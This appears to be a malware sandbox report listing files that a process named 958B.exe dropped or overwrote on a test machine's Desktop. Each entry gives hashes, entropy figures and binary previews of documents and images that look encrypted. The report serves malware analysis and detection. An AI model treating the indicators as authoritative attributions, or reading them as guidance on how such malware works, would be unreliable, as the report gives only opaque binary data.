SHA-512:	B470E52A0EE6C3CA64601AC481272672C55A98EBE38B34AA9C05EE4DD8A2695837A5E793C08718151B2B0D162EE3D99866A10E3E8BC75D182F0279DE82DA2EC5
Malicious:	true
Preview:	EOWRVL-...ut...B.@..wo..4.(.................g....M.`.. ....o.w.SU8....l...a+......#+.....R.S(.sG....)..Y....S.z.v..s....As..o..rLO....T...}V.b.M."....'...#.....k....N.X...a?...Y...Z<..~....:...k........Y&.Kd9.+.rw..J..P&s....6.......N.....VN..MNGt$...=#]........#.ZF%..~K)`...@....4.....^...P.M{.!Z.d8.V.u,.Z.'k9J'@....n.}....^..(..-/..8-.Fw......@.7.A.9.Z...r....kUk.,.^(....4q......e....>..5...l.....;s1.....{...o..u..J...%.r.....`..Z.,L!.K..TJ....$.\|.i..y=......n...W....[3.e.A&.<x.7bY.`.%....u;4..C.O.....L.9_.....F........C{.&..)^lY.I.....PZ..U.......[U.H.....\...H.J..s.y..W.."..[.@..V7?.S..........l.H..{.yFo..^.J...3S.(.y.S.r.W.......=....].CB..oB}S....C.....t....d..a....4B.z;\...../......~.....8.../...........%.;Wmd4.......afif.S..m..)n...g.".....8..aD.~....,.#..z......U.8.7..I.$ro.W.W..8.Dc..V.$\|/E.U\.A..{e`..:9.*..!)...B..>.C.?u...AWP.7ir.k.:R.4K~a#Q...O3,=1.3#..,5..Z.T.`.Iaky`.,.\..U/p.@.W.{.D..-.."0sL..F..<.Y.Q.A..X.u........

C:\Users\user\Desktop\EFOYFBOLXA\GRXZDKKVDB.xlsx

Download File

Process:	C:\Users\user\AppData\Local\Temp\958B.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.872414516170676
Encrypted:	false
SSDEEP:	24:H4TnSyDCZWpzd3CFVnSyjIPZwf0Jdg5Wn4LGYEOMtHQWEtoeaVfcD5UbGabD:H4TSrqd3CFV7aqsLG4+9OQ9em5UbrD
MD5:	17D2A7E6576F916D2BE843750D163B11
SHA1:	2C7660B9E5AEA4AC0ADA7455E586B31F6F433C86
SHA-256:	C99929FC72045D69C5EEC016711D58997B72B50C2590D60309E885299CF0E19B
SHA-512:	EA8077336EB8E5661F64C470A0C125978372B134F785E2254DA3E3DA7A276A88EB3C2F2A3087274A3589101D7E6DDFE80464595BF050E00E848B8BE4C6D518F4
Malicious:	false
Preview:	GRXZD[...].....k.Q..."...7..:.25".`. ..n[.o].K..w....k....&:r...j..y...:g.%...Z..w6\U..I4E..S0.Tb.....N...%(.....sI<.y.X...>....P.k....C...c..k..(..7_If......u..p..N...[<E.yD .Vy.e<g9VG......d.0o.j......."./.G^..2..}Vn.8."f...\.-.`..2..9.(./?..wlhD..l..\|.x.M.J...<.\C.a..d..&i.f?\k.K.....g.........z2..#....x.T^1..w\..f\|....J..<.Q].Q...C.L... Aa.u......M..1.s.l.,.'.A.D.O+..a.........H.4YB.......o...$.t...\|e.......b..WR.z.6.../tp.D...5....?bT.....Vg..a.6k.....X..a..wNx.D.7.H..]y...w...d.<^.\....b ......o<2...#.y..sO.,.w.."X...U...^.A..b..f..0xZl...u.....:.Xz.Qg..~.+...&U...c.x+.1r...M.D"..p..........{..D.....Q.}.`..zi..;...wu....i.3[1..<j.7..q...d^..........i...%..1.....6... ./....z;.....tr3p....t....B....>.+V.;5.TY......D......[.T."...Z.%.P1........f.t.v..o...@..zHo..Od0S_d..'UHmc...x,a..!.~*.Q.`.P.D5~..I...u<...(a.Qjwy.N.bn0.5?...2..B....7s....<>.c_....F....'.......;.t....;;....d..&q\.\.;>/.Z.=A.]..y-.....o.2v...._z.IjSGB......(

C:\Users\user\Desktop\EFOYFBOLXA\PALRGUCVEH.jpg

Download File

Process:	C:\Users\user\AppData\Local\Temp\958B.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.88044591712266
Encrypted:	false
SSDEEP:	24:7QjGyTtRoGw8O90NU8Kb4RyCptC29i/40alCazJQnYv4PHqKYdz6bGabD:UxBvjRYUCKzV9KYAH/o6brD
MD5:	9EED7137CE036E1110C51BA12341FBC7
SHA1:	F7F7045F12F3D381ADC3283D31E037644889EC7E
SHA-256:	C7D54887F3D739036B1F0503051B4A6CD7C0E5439548A8E6C65BDA8A1D5E6E12
SHA-512:	295787FE17F60862E74D39D8000AD1FA107693F3C333E37A9EBCAF6D104106426B44ECCC73D73F074BFF72EE37EE82D00EC76549B90C41E293C1BB40D77AEB80
Malicious:	false
Preview:	PALRG.G1...R.s.........>...w......h;..N...`......Iyz.b)j.L-=..\|.c%...q_.m+.......t..f.......I.U.L.<.b"......M..o^L$"...@<W;S.......f..J.(s.m.K.1B...;...fx".d........#%B..8..haOJ.{x...'!.n'....Mi"./.Q....!..\|.J@m.G.t.i......e(../..\|................M...x.1M..c56.U..r.l......Z.\|X...K.\......Wjr.$..@!@.6.."n.ENRu..3 .....<:s....bCu...=.y.^j./B....+i\...p57.Rm...a..OgsH#.v^".z...b...%..y.s.....$.....w.JZ..J7...K....Ti.I..._.....X.h+...]....E.5.I]..a9.U...0...k.H"...X.../....3......,2).........g.$\|P..+.......={...6..q...2../9....S..r.:_@;5I..B..@..wa[:.B..9\>rqQ..o.^.....Y.GXn.D[.R< ....?.=..].t..b1.C......Bg.....6._4.....$...e:.2......:`Y.2A..........#.2.>.\|......v.x-.....y.h.8.)>.>..Ze.Fx.$'.l./..&.3]..I....l\.a+.AG<Ou.z..r.=z..N.Ut...p...v.y6...Q..mN...]F......F..J.q.2...-...v....t../...v...<6@qq....=...t.<....".m&]^Q.q..;6..%s. ,.t.:..<...< $\.~..X$V..O....j.`.?..U;WI..)....Bz*I.`.,h.....V...z..\....\|....Y.lR.~.I.'.!.....g.."o.....

C:\Users\user\Desktop\EIVQSAOTAQ.jpg

Download File

Process:	C:\Users\user\AppData\Local\Temp\958B.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.842022832510571
Encrypted:	false
SSDEEP:	24:RsiPdZKs9dq/O4c3z86XKQDEHQ0oTHWmJ8TyOPhg/JrDO6WrAqwx4nbDHkEbGabD:RlZPqW4U861JLw5gRfWLbDHkEbrD
MD5:	1FCEFF58C6CB58A54954BAFB3BAB6031
SHA1:	4C6DB3CA8A19148B39CFEC21DA319E37FDAF221F
SHA-256:	BBE1658B3009CCBCCF8F2536449633EB580425EFD38B2807B4B6CCAD7EF2DFE5
SHA-512:	B4D54E66EE6FA4CD2A775C49E3846919CABC1CAA44276A987E7675A4E1F40C1615B968BB7C0245BA3078BB5EB9C37BA073F9C574790CEE65E034A6E29B9A8DCD
Malicious:	true
Preview:	EIVQS4.4... .\|..Y0.../v.[]W.._h\|.omCm.y..+z....uzu.>a.2..{..[D$1.6E......N$...$.z..D>OH.)..phC...."...C,..Cj.b<..0..........%..a..28!..9......&QX.N07.....W..J.V.".nq.E.Uew.ep.!..7.hYw..)".G\|..%_.o...+o....$6.......2x.&.@/...b...#.E2G...C\|K.@..q.l......#j..-..K[..oaK.z.g,.....=.8UL._...$..!..M...g....a...S...1...@[.>0.u...9s`.iR2...'...n.O..P.R#zf}....!......M.(.#.s.../...a.1.g.5...nV.>T.1!_.A.i=....,mN@.(..0.t.1w..\.Su..\|.2...}...z..gX&.v..9s)...7y.....h..{.7...#E.&$1z......U9...vZ..ni.6.z....wh...S82.O.NtGR..L..A...d..Wq."...j...W.........9.....4.cdH..R..,....b...x r..n."^..0z.R.rc&..{[...$x..iM.....b....G.....e...9....t.......e../....4......x....@$.!.(D.vs....(..}`\Sx.<.D.3...s9a....\|.g.v.l..!.E?l.q.....b.O].<....g.:.R83.f9".<...P.Y.N........CM.wE.]..ar..i..9....+.^<..{sc..L..\... ........V.s.`.R.4w2......Na6A@....g...>.4.1<......y2N.m.@...Q......k.g.....&D..zs]...c......V.....\.Z.xc..[...h..n..l...\y.NSU..Z......L...s....`A"......

C:\Users\user\Desktop\EOWRVPQCCS.mp3

Download File

Process:	C:\Users\user\AppData\Local\Temp\958B.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.836627891043122
Encrypted:	false
SSDEEP:	24:ESuItvNKEO9O12/BSxGLmHLuDscUUszgABCngF4xjPbTi5UZiOtBpbGabD:zv1NKEx12ZvmetUUszh0nYSLbuUYOTpz
MD5:	B00CE88977AC255493F7C3E65FF97EA7
SHA1:	7E7BED4DF3D0D1B49EEC589D9F6C5DE376F5B54E
SHA-256:	13F50C0B2D8B6246B9629D1CF441CE5759228262503B6E37B2252575A7719E8B
SHA-512:	E3325E94CC764EADEC0E89E9E63F57DD70332E3FFF1F93FD2CA5CFBC35CE6E16B861B256D3004E5B5B3669E4603032F9DF5E1697FC6CAB9ED321FE3CB1A8B9E1
Malicious:	false
Preview:	EOWRV.k8...1..[.y._.&B...;..].......F.....wp.....5.?=...pH.p95...;,."7........]...n.Rh.AL....eR7......x2b.....>.7....6...c~dA .....7t...nh.5.D .:..eA.....X..C~.W.+.b.5.2.YM.F7...<S.5!..k...:L3./..z...%T.q....{...H....h..i.....7'..v++..T.,P....z.G..s..Y.h.........E....C=.R. B.+....pp31...O........./..$.M.}f.=..}r"{....AeAt.....D....%..gQQ'~.O.....(=rw..(...DyB....b..P.$..6.TR`.x......oT_....P........yQ..7.......[......u...K.......N......D.. .......o..I....i.D..6.7...$YD/..........g".b..$.V..gSg.(...a[.. ..G..-...b<(wb...Af..N.zOy.wx...x..-..(...v.g+.?#be5.cI....n.Y.q.t..jTe...g.sT.I...t..^..tt.i...\|.....S..n.....^$....j..........Rxz..T.SV..&w...7....s.V.1vI...{.N.....hI.."2...]. ..:.R>3.z.5.V.B.4G...Y..D..N.`.-.....'.w..:.t2A_...H.%.DTo..-j...].S(...Ld1Q4...o..>m..4.E.W.<........h.....#.T..y.{...y.5K....NR.....=....T....$..}@F.X^K..]..Fgg18`.....K.^K.C.E.{q..`P2X....Y:....[Ma.+.T.R.g.O.V4a..`..?..&..fd.O.....e..2.+.h;.._....3....I.j.

C:\Users\user\Desktop\EOWRVPQCCS.pdf

Download File

Process:	C:\Users\user\AppData\Local\Temp\958B.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.852448114294832
Encrypted:	false
SSDEEP:	24:Mjq8U3fs/8jykrYO/YUqek9Vf3rcxane4qsjASOKB3FYwuBbGabD:68jykrYOGekPYx4nxjRHqbrD
MD5:	B76F00A3A3A494BF10E5C8A5AE5F7D6C
SHA1:	8B6EBC7BB9480BEF6563D141D0F3A11CFBF359C7
SHA-256:	F7AD335596A53AD9BC7B278C9FC43211EC77968338873EB568111126C836A02B
SHA-512:	0DD8569605C295878718D8A5C87093039777648C7B9BFD94DA0A8A9CEC0CC6AF94EFBDFD4B640DCA77E91EAD8D1E865242DDD9025DB945F7FE9662AC5DC8D567
Malicious:	false
Preview:	EOWRV..fX...8:~%C.K..CwZ..i.8.;...y.e.oqk.l4O....dk..S..uAr...o.OR..U..3)....b.R.-...y...h...)...4.1.v&.....s..5<...U.x.n..^\.C)..q9....C..B.../..-.........X...E.e.1.n...\|......PX.{.....z.j.c.~..G.:...6.J..h...f.)..........a!....y2..z...n18.Z...AG.4...5..-B.(....).o/..w.W?7p..Q6G. D."z.......@.,,p/..q..9.V...]...Pp....0.\...R.P...77h;`E0........w.N..=.1+..O....".....`....B...D.....V.t..)........T.A...\|...;^..ES... ......9A..o.......%U.$......hN..r./,.c..J..6om-v..I"..9.U...s.+...K..g1..z..KgPV.IF..o....vnH\|....s.<.....5X.I...3...s<ap.....i..7.Pw....A\|.....k.F.#...sA..r.z..m..a....W...n..tNx.MC.N...n..Z..2.&....0...._...h..*.....;4...LJ/.....A.......i.../m..l.{Gb.>,......W=.......i....S.p.zS-U..c..Z."vo..k.....Q^.PN.51.\|.8......3.^W?..b..d..........9..9.y..P...........K.x.......8..6V.:..n..... E3..iD._..h3&H......a.q....R;.t..zT......>/I-.t].....^..dJr^....@CU...w...n.T{..z..E.C...+.....z......I@8.k......".\|.L..V..t.p.7.U....Y..7...AI..F..g

C:\Users\user\Desktop\EOWRVPQCCS.xlsx

Download File

Process:	C:\Users\user\AppData\Local\Temp\958B.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.827691158894269
Encrypted:	false
SSDEEP:	24:08FgVVzHroURh7ynPq3EaQW4gF/LWkClPBHBHmFnRS4qxVbGabD:08FKhoC5ynPmmBBhSovVbrD
MD5:	7E92093992ABA6F71DCB8ED24A312B27
SHA1:	6B2F290B7FE3244462729EC7E4F2805B2F8FC7D1
SHA-256:	496537A5D4A325E0EBEC9F51471E9B49E2A446F210E1D7984B53B37668B9DE69
SHA-512:	DD41FBEDF678CC9BA6531A7B8403FE812E9299EA57FE7E4338ABA29D82619014FD4345D8F6F91AA096E9BADB07B2D78E9DA2AC9EB294E7BDA8F81F466B944C61
Malicious:	false
Preview:	EOWRV\|.n.w9h.c...qH.[C.)V...D...5......G.a.Lo...N.........F....P}.cu..2...61.~9.K..j....MU.W\|w3...K.xoL.4FII.A......;p.p.....t...lk[]......7.......lV....U....Y..T,Q..4#........KJ,.E.^...D..Z.]...,.~F.m\...z..(...;~.P....M..)....!..;<S0..C.0.Q....Gs.-....v.E@Y.N...=1.d.Y...(.r...U...2{.E....Ujf...`...egs......~.!.P......eZ...c..i.............e.C.)m.&...]3..........x..j.\..'....tR)T...[./...].+.....M....T.....3..=..;5.d.y.xb.-......i ...._...v=A..I..s.. ...>^....R....O.q.h+.....Y.W..}x.R\|&.....`....S..q.22~.#./....#W.. .!........-.M...\|.mO.....X.4.jg....7...p.i.2..;."Ei]......2/K.2...Z.J~...#J..DX.-..s.....*.>D.@K4..R}...<M..s@........k..v..;M...M.Z..Q.e.C...n.5...Tc.KG.&...j.K..8.z......-.../X..........XI....J..D..@.k+]!r..2o..DV...JK.c.........$...M<..9D. #C..v6.k.3..F......CL.r(4.-.....99L;..`.w...,..Gm........(.v..96i9..V.q.....\h[.3.,...k......l...xo.(.t#q.....o\|....@.}g^...q..P....5.%.y8.Af.T...y... .>.jP{ B)...S.......x..[.Ha...

C:\Users\user\Desktop\EWZCVGNOWT.pdf

Download File

Process:	C:\Users\user\AppData\Local\Temp\958B.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.848664439746545
Encrypted:	false
SSDEEP:	24:3TKv+WIOjQvYK9m4jVhZCjg2K+DMEsby2nL+TvnbGabD:x+UFnLVM72LWbrD
MD5:	D777C4C4BE617C61BBAA2EC716D25491
SHA1:	F5B9274A803CA52ED82955460DA234DDAFB6AED8
SHA-256:	A077A48EEF355D8E240EDED4F573F48B770CECDE790CF7DDE1054E1FA551EFEC
SHA-512:	7D54BD4312BAE2A73DF0A65BD86EDBE478A2C809FA50CF64355E96FCA0EF5B728BE1A45E820778ABC67CDB14061DDB7E5E8AC43CF6D5F2B761B78574A40BA6FD
Malicious:	false
Preview:	EWZCV.!l0.\....!..g.I%....4...E....'_@.-..E.........O&....[.. ......A....M0h.;.zu?..c.P.4..C.K)?).....e;Z-.....3.&..7.8..0rd..).....\|..%.q".....M..'..........B...-...:3..c.....KX..r...Q..].f%..v...y#...t{..8..J..0......V...%...$.$.........dr4_'w..T...p....`.L(>......T..{...Pe..;n1..D^..h...n..o.:..T.78.e G...v...a......n...Vfkk.;i........U..i#.z.1.=.'......wQ...i.m.'...HCiz..".g...[.m.9cZ..T(..g..`...).'Ul5...dPH...`.T..[..vO.....}....}".r..d&Y......%..+r&5.N.h.....>tx...).K4...I.~.qc..^ubp...o..pD.IW..p......?....n+:..Nj....D.Xdy...G.r.x.7d;r...`.k.D....#....3...f._.Yx>.......(..n.o..+\...3gf....T...:k.k1q.pi....H.<..7k....b..V.~~:.....r.^.nr..R...@...N....Y..J.wD..46.'..o2..<uW..I.S.....Y>.C.0..4.a...I.e.......n.7....x...kbMg0.'.g..I6....5i-.i..X.E.:<ZhI..0.j.4/L..1@...r!.....}.......}!...9`u...o.......8./.......^..qE...p.`.P....K8(.{.o.y.j.n.\|y..........=<......fmG..`..3.....8.]G"A...N}1........ n.......f.NU..Ta.Y..z.,..(.e......J..

C:\Users\user\Desktop\GIGIYTFFYT.png

Download File

Process:	C:\Users\user\AppData\Local\Temp\958B.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.845193004954501
Encrypted:	false
SSDEEP:	24:JTv0zS596YUIXOTyTnW6Y/oqjCF0glB6v3S6O2l3IZaxgldCWFKBgy643NkSlbGE:Rv0zi6YBisnaBY6z5qaeldNlyJ3VbrD
MD5:	8D4A0D30A77B1D488A5C7976E305DB2B
SHA1:	5BB9F0E92DDA4A956A81CA4FF9D76A4A6A427B4C
SHA-256:	E8AAB5BA7579BF804816CDE4E66635FBF062AE0785FEFF87FA00734DD7CF455D
SHA-512:	FE1D0F8067CCA9367C2937EF08F8526C07046BF7E3AC0F71996BCA50ED0434D39FDB75031C6E5AFFEC3D2CA13BE427B4F82A09C734AAA721D03F05CE0FCA5D09
Malicious:	false
Preview:	GIGIY.a.5..q..M..5..".<.{..i..=.Z...l..C........qB%.7..M...6p......@.R6.x...A...@).Tk.&.((=.05.2.H;...U........;V5.....d......D.zn:.a>#....:.E.I.....DB.b..Z.J....}."....YC.#N#mY 10.3Zc.s.\|..NCf.:...m=......xPS..e...o.fN..N...w.?..%..$..,.J.=g.F5....3U...*]6..J....G.n.?.c@.O...Gc.}m...:.2S.=s.^\|.8Mz.......Jr,.:`w7.^..R....Vi{....\R..i..#.....(..L...3Q@V..N.......<.wP.(.`....+..,...........Ve.>..s.e......\|J..@.(....:....~......p....W.B...a..+....=...7....U....i\|...q...42..9L..~=&3.......<?...XB..GQ.......wN.U.G..>.yu....Ae.qn...tb.6......j.._J.P:.9..........b..E.......hIZ.<v4..(...O.3........o<.$.tuA3\|d.-......3Kqp..b...s.u.M.D#4%.U>.'=:...`9..$.6}H.\|.2.:.Q..4.t. x.vs>O.p(.qW.......+........b.5...{(...f4g$......O...V..W.r.7..-5;~..!..vo...WQ6.z.7.(Y...{v.9..{.......Z.n\.$..}....s4;T....H..8........Y..H....3.../..!..>..7..5..k. .:..%(..,.w........y.n.ux...{.pA..`6./O.ag.MG.....qI)[..../L.$...G..g{.1.BDS.B..9.o.......F.+r?...vS..P..>........

C:\Users\user\Desktop\GRXZDKKVDB.docx

Download File

Process:	C:\Users\user\AppData\Local\Temp\958B.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.843290794733119
Encrypted:	false
SSDEEP:	24:FZuKrc1Gt3W5UXikXZOEDTTiNX3frq2Ort4L4OubOJoZDPHRbGabD:2Kr6G519TMnTjy6MbpZDZbrD
MD5:	22B96BB187E0A9E46D06EE26DD63E4AA
SHA1:	D658D353E6B5C9A99A26118DCA12CEED23EF9B51
SHA-256:	F7CD6E974068B5917CA9D1BAA0E08C1A59C742B224E778C4EDBA03DB65235CAA
SHA-512:	A6C4C4C1BD46BAAEFC69FB07CAF7BB3EE1C783EB7616D4A411A0CB75B921E0DA1186C1C0910165466E42AD501EF64E6356DB8F700A48602FC0E3731642D8BF13
Malicious:	false
Preview:	GRXZD.l.. >U...v....DlM.M.I...u2P&(.x.v..V.Y.w.Q...)....8.....y.....h....X9....@...2....../...&T'...f!....Jq'\....S....O..\.45.}.?..&'.......j8.l.&...y.f.v....6...q.%.$.i..P5.......D......C..<..+..P.~/2..JJ.....#D...T.A.q.......zU..tH...[..fS.?.R.,.J..Q+....-t....k2..G...N..V...1...l.......9.....n.....!...w....F..ee.....HHRp`.-G.+.....`.p^."%u]@.l.P...+...vo`...+C!..Sy.94.Z...W.-\8.z.:.o..b.E......U........U$.H%..vs@....T...F=...rE..y[2...../_......-....;..GZ%~...........@....Hv........]........p~T1............E......1H..$#?.f..r...n...{Ul.3t.rs..00..g.G#3b.H..s..J.".h.\|.l]y.....tG5....d...&...k.........p..x..H...]Uq.7w....q........b..7k]..&...n...X."F..qR3....n+.E[.&..?.er..2..F.x...I.@T..Q...8.+V..&..u.'..".6a...Z.....a....e.dQ..Y....T...4...9..l.C.0...........Z.I.~.Z..HO...<......1...7.....K..7.J...C..R.~...CSx..7.b.....;..7.... .g..N...+.n..#..O.ac..~.{...<..?+S{.....s.....$..f.la...4R....?7C`.9n..c2...F.c.....d"-

C:\Users\user\Desktop\GRXZDKKVDB.xlsx

Download File

Process:	C:\Users\user\AppData\Local\Temp\958B.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.85795572774985
Encrypted:	false
SSDEEP:	24:AaPbsKnOaZmvl6i1DxElJulueKIDLMI6tkw31dQhXFApbGabD:AazfJQdPpxFlu9GatB1uXFGbrD
MD5:	1A6D171651E25DCD13D2879B4C79F80E
SHA1:	98794EC196E3D19941037EBBF0C74B6D51F6BD79
SHA-256:	36BA1CC602ABE315A5DC8F4EF89DA646922EF3A249B0140D5D376BF5182A8DD4
SHA-512:	7F23393D59C2E68CD2DC6B8D2FDE677E153B2855B7F5382C807D16C268D39652E9BA56596E6EE3638918D2EDEE1CBF73BF494A87603DBFE6E291059F3E73738D
Malicious:	false
Preview:	GRXZD...L.Z{.(..j.~VF..I...F.7.5.......`-.e..f.....1.a,."..f3X%.F....LW."..X.u.o<...M.......gOi.s}4J...T...(......YN.-........4..H0.V...Uj`;.tb[H...uJ.$..80..QqG.'.Vs{. ....W.H}......Y...`..M.p.l.........pKzR..^...G.[....2..2.}9.W..VT.......PI..4...S...<..~..m1A.T...s..._.w...........J...0....&<./.".....\."EgJ..)T\.`....!W..(A..EG3q4....H&....x.`F.QV.'u..n......s..Y5V...^..@~,..%..[=..._....5..0....6.Lu.]&k.C..#H+W!m.S^pk...8..\5..K..L....zvSy. .}...D}."....o....S....Y{.#.Q....v.[.....Rt.u.S.f3.E...`....z.J]Z..n....ka..ig.L...T....uWt.;..Z..zf:n.$.q.@..b...~.<.(Bg..<,........`el.....sW*.` ....(.6;Y..cP....m%,.<....s.8\..S.0.....`.]=..(G..../.-.....;...8.`c.B.Q...h......h.g.@........n............?.25....Y.<G...&...........i.(xW?..Q...4{Q......B.#....v>.n.,....X..#'.~.@....}#:M...;...G...%(.(...\.c...L.[.,..%n..>7...b$..e}.S.8.d.f..a....W.n..{.)."....W...T.KJ`..R."...L.... \|-.F..2.6<.........%.Yr.(y..O.em...6...yr..!.[./..R{FyL..\|.

C:\Users\user\Desktop\GRXZDKKVDB\EIVQSAOTAQ.jpg

Download File

Process:	C:\Users\user\AppData\Local\Temp\958B.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.844921269391075
Encrypted:	false
SSDEEP:	24:RdIfDns28VYTkw4gOX3x7UJdd3RjxhaK0ad2r66U5Q+QvjNfswkbGabD:sLn8VYYw8X3x7wVRjHBztVmvZjkbrD
MD5:	509A162DC06979B3D61653935F475B53
SHA1:	754F3EFACFFFC6E974F4ECF32A78E7A329389B40
SHA-256:	CE0567CD1700E8FA3F728CD6959FC23EA99C179FA5DC01FFB04B83F14C0AB8A1
SHA-512:	39FAB3859C3655C84FB3495DAD1CB22E506530A8688F37DAA619E9285C0194061D926E9CE99661EA82C2E0FEAAB5A494A2CF8637EBA9E4B954546F9CE05351C2
Malicious:	false
Preview:	EIVQSI8"..g^dDa..6....TDh.....eG.....1.gs........DK..S3d....Hg.....c./..C\6.#.5.$..(...\s..m}...4...#.5.xn..O....eF....<../..4>.....b..sc^.)g.uk.....):M...N...H\v.oq ....]....f.@.sA..$t.....Nk.U."...>%O..6.X!.X..?........\KZC.....B..j.'...b.....}...7..X...y.B.X........B.....(.a...h".{..l.\|.>DYS...O&..x0....v.!....w]fN.C...Y.Ae.Z....\|..)H?{x...M...=.......@/G.M.`....Zq...I.i....Y./...3..'..#....T..\O...!).+..c4)PY..(..`.a.. 3....s..x....KO2+.:.NR.)0W...q..;..h.\|.SD.s..'..L....=.z.R.....w...-...\...@.k..;I..)_`....;'.-#vi...7....5%.1.B;.x.O..rPs.b\,4ww.,z.\ha..<O......].{k.^...7..o.]... ...{..N..W.;..C......t~...J.......4.!.......t-<..%~V$.........-{>..Pd...9.....<r-n...x.0..1N@8...........z..[........%[.Eu.........OY.:.).\..M......m... ...p.O...4KNN.K........>.u..".......E>..:............USz.mx.D.6BU9[X ....}...WE...=.w.>...........dIv44.....7Da.su5......_..g ..U.:.n.W.8.w..i.$ ...Q.X1.M....$.s..>...?.v...z...S..c+W.......p.....

C:\Users\user\Desktop\GRXZDKKVDB\EOWRVPQCCS.pdf

Download File

Process:	C:\Users\user\AppData\Local\Temp\958B.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.84112684708921
Encrypted:	false
SSDEEP:	24:5g5gT6y2pGOTmtt1/ULASQgEbryQElIcjSQ7UE0aWUbxbRwuk6TMmx6pyPKDbGaX:5fT6RpGAmtL/4AuvIctUE0aWKyukRmxs
MD5:	D5A4B446C547ADE663BE16BB72157A20
SHA1:	9B3A636BD0503B0AF71E7933B72C10EC69D62CF6
SHA-256:	EA8FF36C7C7AFDA1B4DC2D84B8B1DD4E71E2B9B8E12386FDE2E1AF01C8513C9F
SHA-512:	3FFDE424099143612165FCA4330F2044D44459FAFB34CDA0804BA9E087F854EF182797B435DECA170BC91308C4BE56A1B7E896E41111FF99EF3B8048A6F17E47
Malicious:	false
Preview:	EOWRV....i..8....\+F.%<..C...G..C{uHhd.....)..1d..m..PXw.....oO7..Yfg.v.Y..1.0).0..^...K........<'...u...`}<.rK../....'%.#...:....uC.5.....#....D.F\.mx..x.....H.9.&.p.#.0BO...(..j..jj.....r.U..[Sz.A..._....MF4.7S.?.T=.9v.?6....\|..^.:...a....?.N....s.\S{....$.2.\;......w.K.(..........`..p....t1.Nd.....Q^.A.3...{........<.4@nV.U.d.>...1...o^.9...b...H.....c..f ow...N.]O....Y...l....J.a.;.r.F......&..R....8c(.u..c.D..t%..\Y...aC.U..IkGXk...s..Z.f..k.=Cs...R..."%...\a.$...).S....".....V..5I....7..s.W..~j....(U../.#.j.{.%..jB.8`.....1..N....d~.DY.`..oeI;7b{.e...2.....W...o..I.Y.P...x{.?.9...gNM.......,F5..$.8..>{-.v....7./h%.........u.....3`......O.gj.../v..`.E^...`~..c.U,3.%..vS..R./.=.W..{...g.v..A...4%.t...b..... J..p.P....}.)..s)......u....e..&.g.....4%......A.C.!`.^i..r..Em. L..{.\|k..I.....#.7.....;.V...:.....w0...9`..hT<..1....H.....o.f.[7..\...vZxO8.h..[.L .......... ..].....e..O..iI.c;n.(.DXb...a..P.....*.5kp....._..L....

C:\Users\user\Desktop\GRXZDKKVDB\GIGIYTFFYT.png

Download File

Process:	C:\Users\user\AppData\Local\Temp\958B.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.872719923074855
Encrypted:	false
SSDEEP:	24:qPBWY8Ip2exQuflt1Yh5VhEbZ9o/fnyXJ1/m8x50GbGabD:q580df6hnhYZa/aXP/P5brD
MD5:	5A008F879DA4396662C9BD088FF313ED
SHA1:	7CD4CE1C78F5909808B78FC21637C3A19885F5FF
SHA-256:	5FD9B782503E3BCF2F1E885964DBDF7EC010BF80B44E023AD93F46F381999BD0
SHA-512:	013FB7D396FCD10EB3B586577FD244C93CCE8B2C45043F374A86A1F7EF455C19783257E1B2D84177BCC83A723D0F7AE593B67DD5BBCA19B51B84ED140D0E7471
Malicious:	false
Preview:	GIGIY...~......d...l..........+.8..0..{.../U...S+q.x.S./.&]nu.?uS....D.GZ.......in!..&..<....l........X.k.+.cP!.GI..`.+.w./...GD....i..6.,.XPD6C,...\|x.......Z..W..A.L\.#..Vj.V......O.tH.....v.&...Au....Y...>^.-......X=z...'...r.qT..\.T..Q.O!{.e.)Z{..9c.#!_.\.\....3...{.....qe.9.XU.-@....?#....<..F1.q..}...&xN..Cf..o.y..pmB..v!...q..F......wkK.w.b8R...."njjY]....e..S...n`..+.c.m.E.LQ....)G.....%.....,...T..{.A[.{bt.[h....9/...P...^.xR...f..by...99..y..'1.......<..2B.7..HM.I.(._WhR...w..7.?%...x?.......#h.h..f.OUU0.6..f..WpJ.\|.a.P..+...O........"n...f^+x...% ..)]..j..P..Q.L)Xzf@..6'..7.t?.....+2X.J.s....}.g...].&.f.v......igx.f.1.'.Bf.C#.....dVr...wG.C....P{.+w.\|)..j>$.w...:A.=O:.\|.~....Y"....d#.L...]Z.....~.`..8.;8.~E\4v......[.M.a.g.b..J~.....g....M..m#.y!.F.Q7!.+]...../...F.K......[).$.B..o...G......Nv..^].t&...;...m.h.O..o)-....6...d.h@..C_.k..2..3....lV..{..3..p.{..Ru...)..,......]....u...H\4-......{..4.. xT<..K.G..2]\|.J..&.....,

C:\Users\user\Desktop\GRXZDKKVDB\GRXZDKKVDB.docx

Download File

Process:	C:\Users\user\AppData\Local\Temp\958B.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.8458731452952035
Encrypted:	false
SSDEEP:	24:J2+ZE7cHHj8t4qBETGwInXdWgr0vGh/QHcyCDJ5qM9NE5zPCUU6CsfeRyB//vmSD:JFE4HD8tUGwIXdWgAvGmCDJ5qM9WTFxZ
MD5:	A7D99761BBCE10FEE416835759A0646F
SHA1:	F9D0F1C6751937243E4D58EA9A143F0E670A938D
SHA-256:	74468C6286825DBE60FF218871B1B0F956E6748BB87CCD2234F3670064174DC0
SHA-512:	9A6EAB79A01E6C0C8C6E18DD4B3E437298CA0FE5350F119F9068E375CCFB9B541C20F9BBE8362F4922C30E7B8635D7809407C85EF922E7FA4A5870BB7B96EBBA
Malicious:	false
